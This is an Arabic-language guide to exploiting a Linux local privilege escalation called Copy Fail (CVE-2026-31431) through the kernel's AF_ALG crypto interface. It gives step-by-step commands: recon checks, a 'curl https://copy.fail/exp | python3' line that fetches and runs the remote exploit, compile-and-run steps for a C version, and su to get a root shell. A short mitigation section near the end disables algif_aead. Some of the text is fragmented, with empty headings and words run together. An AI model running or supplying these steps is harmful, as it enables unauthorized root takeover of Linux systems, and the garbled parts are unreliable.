
معظم ثغرات رفع الامتيازات المحلية (LPE) في لينكس تحتاج إلى نافذة سباق (race window) أو إزاحة خاصة بالنواة. Copy Fail هو عيب منطقي مستقيم، لا يحتاج إلى أيٍّ منهما. نفس السكربت بايثون المكوّن من 732 بايت (أو ملف .c elf) يمنح صلاحيات الجذر (root) لكل توزيعة لينكس صدرت منذ عام 2017.
هذا المحتوى مخصص لأغراض تعليمية واختبارات الأمان المصرح بها فقط. لا تقم بتشغيله على أنظمة دون إذن صريح.
Copy Fail (CVE-2026-31431) هي ثغرة تصعيد صلاحيات محلية (LPE) في نظام Linux تؤثر على واجهة برمجة تطبيقات التشفير في النواة عبر AF_ALG.
تسمح لمستخدم غير مميز بالكتابة فوق بيانات ذاكرة التخزين المؤقت للصفحات (page cache) لملف ثنائي SUID (مثل /usr/bin/su) والحصول على صلاحيات الجذر (root).
AF_ALGalgif_aeados.splicesocket(AF_ALG)uname -a
grep -i authencesn /proc/crypto
lsmod | grep alg
المؤشرات المتوقعة:
authencesn(hmac(sha256),cbc(aes))algif_aeadpython3 copy_fail_exp.py
curl https://copy.fail/exp | python3
su
id
النتيجة المتوقعة:
uid=0(root)
os.splice not foundالسبب:
الحل:
gcc copy_fail_exp.c -o copy_fail
chmod +x copy_fail
./copy_fail
su
الأسباب المحتملة:
قم بتثبيت الأدوات المطلوبة:
apt update && apt install build-essential
dmesg | grep -i alg
lsmod | grep algif_aead
echo "install algif_aead /bin/false" > /etc/modprobe.d/disable-algif.conf
rmmod algif_aead
قم بتحديث نظامك:
apt update && apt upgrade
إذا فشل الاستغلال، ففكر في:
استخدم هذا الاستغلال بمسؤولية في المختبرات ومسابقات CTF واختبارات الاختراق المصرح بها فقط.